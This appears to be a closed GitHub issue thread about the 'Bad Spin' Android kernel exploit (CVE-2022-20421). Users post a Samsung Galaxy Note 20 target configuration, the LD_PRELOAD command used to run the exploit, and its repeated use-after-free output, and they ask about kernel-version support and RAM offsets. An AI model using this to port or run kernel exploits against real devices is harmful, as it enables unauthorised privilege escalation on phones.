Closed alberticoalmaguer closed 1 year ago
{ .name = "Samsung Galaxy Note 20", .model = "SM-N981U", .android_version = 12, .android_security_patch.year = 2022, .android_security_patch.month = 9, .kernel_version = KERNEL_VERSION(4, 19, 113), .ram_offset = 0x28000000UL, }
QS1: Is the exploit only working on Kernel Version 5,x,x? QS2: How can I get the ram+offset?
[x] Looking for binder_proc's inner_lock offset [x] Trigger vulnerability... (mode = 1) [x] Trigger use-after-free [x] Finish spinning at spin_lock() [x] Trigger vulnerability... (mode = 1) [x] Trigger use-after-free [x] Finish spinning at spin_lock() [x] Trigger vulnerability... (mode = 1) [x] Trigger use-after-free [x] Finish spinning at spin_lock() [x] Trigger vulnerability... (mode = 1) [x] Trigger use-after-free [x] Finish spinning at spin_lock() [x] Trigger vulnerability... (mode = 1) [x] Trigger use-after-free [x] Finish spinning at spin_lock() [x] Trigger vulnerability... (mode = 1)
The exploit works on devices running on kernel versions 5.4.x and 5.10.x only
Great Job. But is is possible to work on pixel 6 emulator?
{ .name = "Samsung Galaxy Note 20", .model = "SM-N981U", .android_version = 12, .android_security_patch.year = 2022, .android_security_patch.month = 9, .kernel_version = KERNEL_VERSION(4, 19, 113), .ram_offset = 0x28000000UL, }
QS1: Is the exploit only working on Kernel Version 5,x,x? QS2: How can I get the ram+offset?
c1q:/ $ LD_PRELOAD=/data/local/tmp/libbadspin.so sleep 1
Bad Spin Exploit (CVE-2022-20421) by 0xkol
[x] Looking for binder_proc's inner_lock offset [x] Trigger vulnerability... (mode = 1) [x] Trigger use-after-free [x] Finish spinning at spin_lock() [x] Trigger vulnerability... (mode = 1) [x] Trigger use-after-free [x] Finish spinning at spin_lock() [x] Trigger vulnerability... (mode = 1) [x] Trigger use-after-free [x] Finish spinning at spin_lock() [x] Trigger vulnerability... (mode = 1) [x] Trigger use-after-free [x] Finish spinning at spin_lock() [x] Trigger vulnerability... (mode = 1) [x] Trigger use-after-free [x] Finish spinning at spin_lock() [x] Trigger vulnerability... (mode = 1)